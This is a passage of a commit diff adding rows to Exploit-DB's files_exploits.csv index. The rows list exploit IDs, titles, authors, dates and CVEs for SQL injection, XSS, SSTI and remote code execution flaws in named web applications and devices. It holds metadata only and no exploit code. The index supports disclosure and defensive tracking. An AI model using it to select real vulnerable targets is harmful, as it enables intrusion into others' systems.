or exploits by the author or elsewhere. All content (c).
hyp3rlinx

27
files_exploits.csv
View file

@ -2902,6 +2902,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
51961,exploits/go/webapps/51961.txt,"Casdoor < v1.331.0 - '/api/set-password' CSRF",2024-04-02,"Van Lam Nguyen",webapps,go,,2024-04-02,2024-04-02,0,CVE-2023-34927,,,,,
51869,exploits/go/webapps/51869.txt,"Ladder v0.0.21 - Server-side request forgery (SSRF)",2024-03-10,@_chebuya,webapps,go,,2024-03-10,2024-03-10,0,CVE-2024-27620,,,,,
51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,,
51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
@ -3625,6 +3626,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,,2020-11-19,2020-11-19,0,CVE-2020-25988,,,,,
43983,exploits/hardware/remote/43983.py,"Geovision Inc. IP Camera & Video - Remote Command Execution",2018-02-01,bashis,remote,hardware,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/65f7f29ef395d2b6faad91b2a3d62078539a98de/Geovision-PoC.py
43982,exploits/hardware/remote/43982.txt,"Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access",2018-02-01,bashis,remote,hardware,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/65f7f29ef395d2b6faad91b2a3d62078539a98de/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
51942,exploits/hardware/remote/51942.py,"GL-iNet MT6000 4.5.5 - Arbitrary File Download",2024-04-02,"Bandar Alharbi",remote,hardware,,2024-04-02,2024-04-02,0,CVE-2024-27356,,,,,
51854,exploits/hardware/remote/51854.py,"GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit",2024-03-03,cyberaz0r,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
51851,exploits/hardware/remote/51851.py,"GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit",2024-03-03,cyberaz0r,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
51852,exploits/hardware/remote/51852.py,"GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit",2024-03-03,cyberaz0r,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
@ -14488,6 +14490,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4545,exploits/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusions",2007-10-18,S.W.A.T.,webapps,php,,2007-10-17,2016-10-20,1,OSVDB-44786;CVE-2007-5592;OSVDB-44785;OSVDB-44784;OSVDB-44783;OSVDB-44782;OSVDB-44781,,,,http://www.exploit-db.comawzmb_4.2_beta1.zip,
4599,exploits/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php?module' Local File Inclusion",2007-11-02,GoLd_M,webapps,php,,2007-11-01,2016-10-20,1,OSVDB-39021;CVE-2007-5820,,,,http://www.exploit-db.comaxdcms-0.1.1.tar.gz,
15938,exploits/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Inclusion",2011-01-08,n0n0x,webapps,php,,2011-01-08,2011-01-08,1,CVE-2011-0506;OSVDB-70615,,,,http://www.exploit-db.comaxdcms-0.1.1.zip,
51963,exploits/php/webapps/51963.txt,"Axigen < 10.5.7 - Persistent Cross-Site Scripting",2024-04-02,"Vincent McRae_ Mesut Cetin",webapps,php,,2024-04-02,2024-04-02,0,CVE-2023-48974,,,,,
3108,exploits/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion",2007-01-09,DeltahackingTEAM,webapps,php,,2007-01-08,,1,OSVDB-32716;CVE-2007-0200,,,,,
17703,exploits/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) - Persistent Cross-Site Scripting",2011-08-20,"Eyup CELIK",webapps,php,,2011-08-20,2011-08-20,0,,,,,http://www.exploit-db.comaxis-0.8.1.zip,
18793,exploits/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection",2012-04-27,"H4ckCity Secuirty TeaM",webapps,php,,2012-04-27,2012-04-27,1,OSVDB-81497,,,,,
@ -15017,6 +15020,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51912,exploits/php/webapps/51912.txt,"Blood Bank 1.0 - 'bid' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,CVE-2023-46022,,,,,
50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,,
51833,exploits/php/webapps/51833.txt,"Blood Bank v1.0 - Multiple SQL Injection",2024-02-28,"Ersin Erenler",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
51955,exploits/php/webapps/51955.txt,"Blood Bank v1.0 - Stored Cross Site Scripting (XSS)",2024-04-02,"Ersin Erenler",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-06,1,,,,,,
47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,,2020-01-02,2020-02-07,1,,,,,,
48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
@ -15532,6 +15536,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14560,exploits/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusions",2010-08-05,eidelweiss,webapps,php,,2010-08-05,2010-08-06,1,CVE-2008-5949;OSVDB-50447,,,,http://www.exploit-db.comccTiddly_v1.7.6.zip,http://eidelweiss-advisories.blogspot.com/2010/08/cctiddly-v176-multiple-remote-file.html
11401,exploits/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-10,,1,OSVDB-62278;CVE-2010-0762,,,,,
2540,exploits/php/webapps/2540.txt,"Cdsagenda 4.2.9 - 'SendAlertEmail.php' File Inclusion",2006-10-13,Drago84,webapps,php,,2006-10-12,2016-09-12,1,OSVDB-29735;CVE-2006-5384,,,,http://www.exploit-db.comcdsagenda-4.2.9.tar.gz,
51957,exploits/php/webapps/51957.py,"CE Phoenix v1.0.8.20 - Remote Code Execution",2024-04-02,tmrswrr,webapps,php,,2024-04-02,2024-04-02,0,,,,,,
22241,exploits/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 - Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,webapps,php,,2003-02-09,2012-10-25,1,CVE-2003-1410;OSVDB-5487,,,,,https://www.securityfocus.com/bid/6818/info
22242,exploits/php/webapps/22242.txt,"Cedric Email Reader 0.4 - Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,webapps,php,,2003-02-09,2012-10-25,1,CVE-2003-1411;OSVDB-5900,,,,,https://www.securityfocus.com/bid/6820/info
29624,exploits/php/webapps/29624.txt,"CedStat 1.31 - 'index.php' Cross-Site Scripting",2007-02-21,sn0oPy,webapps,php,,2007-02-21,2013-11-16,1,CVE-2007-1020;OSVDB-33734,,,,,https://www.securityfocus.com/bid/22653/info
@ -16730,6 +16735,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47213,exploits/php/webapps/47213.txt,"Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)",2019-08-08,"Mr Winst0n",webapps,php,80,2019-08-08,2019-08-08,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comexpense.zip,
48737,exploits/php/webapps/48737.txt,"Daily Expenses Management System 1.0 - 'item' SQL Injection",2020-08-07,screetsec,webapps,php,,2020-08-07,2020-08-07,0,,,,,,
48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php,,2020-08-04,2020-08-04,0,,,,,,
51954,exploits/php/webapps/51954.md,"Daily Habit Tracker 1.0 - Broken Access Control",2024-04-02,"Yevhenii Butenko",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24496,,,,,
51953,exploits/php/webapps/51953.md,"Daily Habit Tracker 1.0 - SQL Injection",2024-04-02,"Yevhenii Butenko",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24495,,,,,
51952,exploits/php/webapps/51952.md,"Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)",2024-04-02,"Yevhenii Butenko",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24494,,,,,
13865,exploits/php/webapps/13865.txt,"Daily Inspirational Quotes Script - SQL Injection",2010-06-14,Valentin,webapps,php,,2010-06-13,,1,,,,,,
48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,,2020-09-03,2020-09-03,0,,,,,,
47846,exploits/php/webapps/47846.txt,"Dairy Farm Shop Management System 1.0 - 'username' SQL Injection",2020-01-06,"Chris Inzinga",webapps,php,,2020-01-06,2020-02-10,1,,,,,,
@ -17468,6 +17476,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37302,exploits/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",webapps,php,,2015-06-16,2015-06-16,0,OSVDB-123315;OSVDB-123314,,,,,
3846,exploits/php/webapps/3846.txt,"E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion",2007-05-04,kezzap66345,webapps,php,,2007-05-03,2016-09-30,1,OSVDB-35773;CVE-2007-2521,,,,http://www.exploit-db.come-gads_2.2.6.tar.gz,
34876,exploits/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean - Multiple SQL Injections",2009-08-27,Moudi,webapps,php,,2009-08-27,2014-10-03,1,CVE-2009-3184;OSVDB-57463,,,,,https://www.securityfocus.com/bid/44229/info
51944,exploits/php/webapps/51944.txt,"E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
48629,exploits/php/webapps/48629.txt,"e-learning Php Script 0.1.0 - 'search' SQL Injection",2020-07-01,KeopssGroup0day_Inc,webapps,php,,2020-07-01,2020-07-01,0,,,,,,
49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass",2021-01-15,"Himanshu Shukla",webapps,php,,2021-01-15,2021-10-29,0,,,,,,
35027,exploits/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injections",2010-11-26,ali_err0r,webapps,php,,2010-11-26,2014-10-21,1,,,,,,https://www.securityfocus.com/bid/45098/info
@ -17883,6 +17892,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37572,exploits/php/webapps/37572.txt,"Elefant CMS - 'id' Cross-Site Scripting",2012-08-03,PuN!Sh3r,webapps,php,,2012-08-03,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54805/info
26416,exploits/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php?id' SQL Injection",2013-06-24,"CWH Underground",webapps,php,,2013-06-24,2013-06-24,0,OSVDB-94541;CVE-2013-4952,,,,http://www.exploit-db.comElemataRC3.0.zip,
25951,exploits/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injections",2005-07-07,"Diabolic Crab",webapps,php,,2005-07-07,2013-06-05,1,,,,,,https://www.securityfocus.com/bid/14180/info
51956,exploits/php/webapps/51956.py,"Elementor Website Builder < 3.12.2 - Admin+ SQLi",2024-04-02,"E1 Coders",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
36925,exploits/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",webapps,php,,2015-05-08,2015-05-08,0,OSVDB-121835,,,,http://www.exploit-db.comelFinder-2.0-rc1.tar.gz,
46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - 'PHP connector' Command Injection",2019-03-04,q3rv0,webapps,php,80,2019-03-04,2019-03-13,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/
51864,exploits/php/webapps/51864.txt,"elFinder Web file manager Version - 2.1.53 Remote Command Execution",2024-03-06,tmrswrr,webapps,php,,2024-03-06,2024-03-06,0,,,,,,
@ -17946,6 +17956,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51911,exploits/php/webapps/51911.txt,"Employee Management System 1.0 - 'admin_id' SQLi",2024-03-20,"Shubham Pandey",webapps,php,,2024-03-20,2024-03-20,0,CVE-2024-28595,,,,,
48882,exploits/php/webapps/48882.txt,"Employee Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
48881,exploits/php/webapps/48881.txt,"Employee Management System 1.0 - Cross Site Scripting (Stored)",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
51950,exploits/php/webapps/51950.md,"Employee Management System 1.0 - _txtfullname_ and _txtphone_ SQL Injection",2024-04-02,"Yevhenii Butenko",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24499,,,,,
51951,exploits/php/webapps/51951.md,"Employee Management System 1.0 - _txtusername_ and _txtpassword_ SQL Injection (Admin Login)",2024-04-02,"Yevhenii Butenko",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24497,,,,,
51803,exploits/php/webapps/51803.txt,"Employee Management System v1 - 'email' SQL Injection",2024-02-19,SoSPiro,webapps,php,,2024-02-19,2024-02-19,0,,,,,,
49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,,2020-12-08,2020-12-08,0,,,,,,
51049,exploits/php/webapps/51049.txt,"Employee Performance Evaluation System v1.0 - File Inclusion and RCE",2023-03-25,nu11secur1ty,webapps,php,,2023-03-25,2023-03-25,0,,,,,,
@ -18676,6 +18688,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
26132,exploits/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",webapps,php,,2013-06-11,2013-06-12,1,OSVDB-94208,,,http://www.exploit-db.com/screenshots/idlt26500/screen-shot-2013-06-12-at-13455-pm-1.png,http://www.exploit-db.comFOBUC_0.9.zip,
4377,exploits/php/webapps/4377.txt,"Focus/SIS 1.0/2.2 - Remote File Inclusion",2007-09-08,"ThE TiGeR",webapps,php,,2007-09-07,,1,OSVDB-36998;CVE-2007-4942;OSVDB-36997;CVE-2007-4807;OSVDB-36953;CVE-2007-4806;OSVDB-36952,,,,,
25088,exploits/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,webapps,php,,2013-04-29,2013-04-29,1,OSVDB-92859;OSVDB-92858,,,,http://www.exploit-db.comFoeCMS1.6.5.rar,
51947,exploits/php/webapps/51947.txt,"FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)",2024-04-02,"Chokri Hammedi",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
51948,exploits/php/webapps/51948.txt,"FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)",2024-04-02,"Chokri Hammedi",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
5784,exploits/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusions",2008-06-11,"CWH Underground",webapps,php,,2008-06-10,,1,OSVDB-46126;CVE-2008-2993,,,,,
49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php,,2021-04-29,2021-04-29,0,,,,,http://www.exploit-db.comfogproject-1.5.9.tar.gz,
1778,exploits/php/webapps/1778.txt,"Foing 0.7.0 - 'phpBB' Remote File Inclusion",2006-05-12,"Kurdish Security",webapps,php,,2006-05-11,,1,OSVDB-44302;CVE-2006-2507;OSVDB-44301;OSVDB-44300;OSVDB-44299;OSVDB-44298;OSVDB-25564,,,,,http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html
@ -19224,6 +19238,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3271,exploits/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution",2007-02-05,Kacper,webapps,php,,2007-02-04,,1,OSVDB-35849;CVE-2007-0804,,,,,
26653,exploits/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - 'search.php' SQL Injection",2005-11-29,r0t,webapps,php,,2005-11-29,2013-07-07,1,CVE-2005-3908;OSVDB-21371,,,,,https://www.securityfocus.com/bid/15634/info
51903,exploits/php/webapps/51903.py,"Gibbon LMS < v26.0.00 - Authenticated RCE",2024-03-18,"Ali Maharramli_Fikrat Guliev_Islam Rzayev",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
51962,exploits/php/webapps/51962.txt,"Gibbon LMS v26.0.00 - SSTI vulnerability",2024-04-02,"Ali Maharramli_Fikrat Guliev_Islam Rzayev",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24724,,,,,
42442,exploits/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php,,2017-08-10,2017-08-10,0,,,,,,
44718,exploits/php/webapps/44718.txt,"Gigs 2.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,,
47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80,2019-07-29,2019-07-29,0,,"Cross-Site Scripting (XSS)",,,,
@ -19662,6 +19677,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47840,exploits/php/webapps/47840.txt,"Hospital Management System 4.0 - 'searchdata' SQL Injection",2020-01-02,FULLSHADE,webapps,php,,2020-01-02,2020-02-07,1,CVE-2020-5192,,,,,
47836,exploits/php/webapps/47836.py,"Hospital Management System 4.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,,2020-01-01,2020-02-07,1,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
47841,exploits/php/webapps/47841.txt,"Hospital Management System 4.0 - Persistent Cross-Site Scripting",2020-01-02,FULLSHADE,webapps,php,,2020-01-02,2020-02-07,1,CVE-2020-5191,,,,,
51945,exploits/php/webapps/51945.txt,"Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
47398,exploits/php/webapps/47398.txt,"Hospital-Management 1.26 - 'fname' SQL Injection",2019-09-18,cakes,webapps,php,,2019-09-18,2019-09-18,1,,,,,http://www.exploit-db.comhospital-management.zip,
50658,exploits/php/webapps/50658.txt,"Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS)",2022-01-13,Sant268,webapps,php,,2022-01-13,2022-01-13,0,,,,,,
50630,exploits/php/webapps/50630.txt,"Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)",2022-01-05,twseptian,webapps,php,,2022-01-05,2022-01-05,0,,,,,,
@ -22513,6 +22529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40248,exploits/php/webapps/40248.txt,"Lepton CMS 2.2.0/2.2.1 - PHP Code Injection",2016-08-16,hyp3rlinx,webapps,php,80,2016-08-16,2016-08-16,0,,,,,http://www.exploit-db.comLEPTON_stable_2.2.0.zip,http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt
49137,exploits/php/webapps/49137.txt,"LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting",2020-12-01,"Sagar Banwa",webapps,php,,2020-12-01,2020-12-03,0,CVE-2020-29240,,,,,
48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php,,2020-03-25,2020-05-11,0,CVE-2020-12707,,,,,
51949,exploits/php/webapps/51949.txt,"LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)",2024-04-02,tmrswrr,webapps,php,,2024-04-02,2024-04-02,0,,,,,,
34935,exploits/php/webapps/34935.txt,"LES PACKS - 'ID' SQL Injection",2010-10-27,Cru3l.b0y,webapps,php,,2010-10-27,2014-10-11,1,,,,,,https://www.securityfocus.com/bid/44457/info
2449,exploits/php/webapps/2449.txt,"Les Visiteurs (Visitors) 2.0 - 'config.inc.php' File Inclusion",2006-09-28,D_7J,webapps,php,,2006-09-27,,1,,,,,,
28727,exploits/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusions",2006-09-28,D_7J,webapps,php,,2006-09-28,2013-10-04,1,,,,,,https://www.securityfocus.com/bid/20259/info
@ -24920,6 +24937,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48945,exploits/php/webapps/48945.txt,"Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-26,"Akıner Kısa",webapps,php,,2020-10-26,2020-10-26,0,,,,,,
48482,exploits/php/webapps/48482.txt,"Online Healthcare management system 1.0 - Authentication Bypass",2020-05-18,BKpatron,webapps,php,,2020-05-18,2020-05-18,0,,,,,,
48481,exploits/php/webapps/48481.txt,"Online Healthcare Patient Record Management System 1.0 - Authentication Bypass",2020-05-18,"Daniel Monzón",webapps,php,,2020-05-18,2020-05-18,0,,,,,,
51938,exploits/php/webapps/51938.py,"Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)",2024-04-02,"Gian Paris C. Agsam",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
41181,exploits/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",webapps,php,,2017-01-27,2017-01-27,0,,,,,,
49428,exploits/php/webapps/49428.txt,"Online Hotel Reservation System 1.0 - 'description' Stored Cross-site Scripting",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,,
49429,exploits/php/webapps/49429.txt,"Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,,
@ -25162,6 +25180,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",2021-11-29,"Hubert Wojciechowski",webapps,php,,2021-11-29,2021-11-30,0,,,,,http://www.exploit-db.comopencart-3.0.3.8.zip,
49407,exploits/php/webapps/49407.txt,"OpenCart 3.0.36 - ATO via Cross Site Request Forgery",2021-01-11,"Mahendra Purbia",webapps,php,,2021-01-11,2021-01-11,0,,,,,,
47331,exploits/php/webapps/47331.txt,"Opencart 3.x - Cross-Site Scripting",2019-09-02,"Nipun Somani",webapps,php,,2019-09-02,2019-09-02,0,CVE-2019-15081,,,,,
51940,exploits/php/webapps/51940.txt,"OpenCart Core 4.0.2.3 - 'search' SQLi",2024-04-02,"Saud Alenazi",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
49044,exploits/php/webapps/49044.txt,"OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure",2020-11-13,"Jinson Varghese Behanan",webapps,php,,2020-11-13,2020-11-13,0,CVE-2020-15478,,,,,
50942,exploits/php/webapps/50942.txt,"OpenCart v3.x Newsletter Module - Blind SQLi",2022-05-23,"Saud Alenazi",webapps,php,,2022-05-23,2022-05-23,0,,,,,,
12475,exploits/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,cr4wl3r,webapps,php,,2010-04-30,,1,OSVDB-64183;CVE-2010-1999,,,,http://www.exploit-db.comopenmairie_catalogue_1.024.zip,
@ -25827,6 +25846,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41586,exploits/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php,,2017-03-11,2017-03-11,0,,,,,,
50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-29,Mr.Gedik,webapps,php,,2021-09-29,2021-09-29,0,,,,,,
38391,exploits/php/webapps/38391.txt,"Petite Annonce - Cross-Site Scripting",2013-03-14,Metropolis,webapps,php,,2013-03-14,2015-10-03,1,,,,,,https://www.securityfocus.com/bid/58508/info
51943,exploits/php/webapps/51943.txt,"Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
51032,exploits/php/webapps/51032.py,"pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)",2023-02-20,IHTeam,webapps,php,,2023-02-20,2023-02-20,0,CVE-2022-31814,,,,,
6442,exploits/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,webapps,php,,2008-09-11,2016-12-22,1,OSVDB-48109;CVE-2008-4355,,,,,
23901,exploits/php/webapps/23901.txt,"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution",2013-01-05,"Yann CAM",webapps,php,,2013-01-05,2013-04-15,1,OSVDB-88930;OSVDB-88929;OSVDB-88928,,,http://www.exploit-db.com/screenshots/idlt24000/screenshot.png,,
@ -29579,6 +29599,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35290,exploits/php/webapps/35290.txt,"SimpGB 1.49.2 - 'Guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,webapps,php,,2011-01-26,2014-11-18,1,,,,,,https://www.securityfocus.com/bid/46033/info
50301,exploits/php/webapps/50301.txt,"Simple Attendance System 1.0 - Authenticated bypass",2021-09-17,"Abdullah Khawaja",webapps,php,,2021-09-17,2021-09-17,0,,,,,,
50312,exploits/php/webapps/50312.txt,"Simple Attendance System 1.0 - Unauthenticated Blind SQLi",2021-09-22,"()t/\\/\\1",webapps,php,,2021-09-22,2021-09-22,0,,,,,,
51937,exploits/php/webapps/51937.txt,"Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal",2024-04-02,Ven3xy,webapps,php,,2024-04-02,2024-04-02,0,,,,,,
40518,exploits/php/webapps/40518.txt,"Simple Blog PHP 2.0 - Multiple Vulnerabilities",2016-10-13,"Ehsan Hosseini",webapps,php,,2016-10-13,2016-10-13,0,,,,,,
40519,exploits/php/webapps/40519.txt,"Simple Blog PHP 2.0 - SQL Injection",2016-10-13,"Ehsan Hosseini",webapps,php,,2016-10-13,2016-10-13,0,,,,,,
12006,exploits/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Arbitrary File Upload",2010-04-01,indoushka,webapps,php,,2010-03-31,,0,,,,,,
@ -29903,6 +29924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php,,2009-12-13,,1,CVE-2007-0518;OSVDB-32946,,,,,
10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,http://www.exploit-db.comphpuploader.zip,
5003,exploits/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Remote Code Execution",2008-01-29,GoLd_M,webapps,php,,2008-01-28,2016-11-14,1,OSVDB-40780;CVE-2008-0503,,,,http://www.exploit-db.comsmart-publisher-1.0.1.zip,
51958,exploits/php/webapps/51958.txt,"Smart School 6.4.1 - SQL Injection",2024-04-02,CraCkEr,webapps,php,,2024-04-02,2024-04-02,0,,,,,,
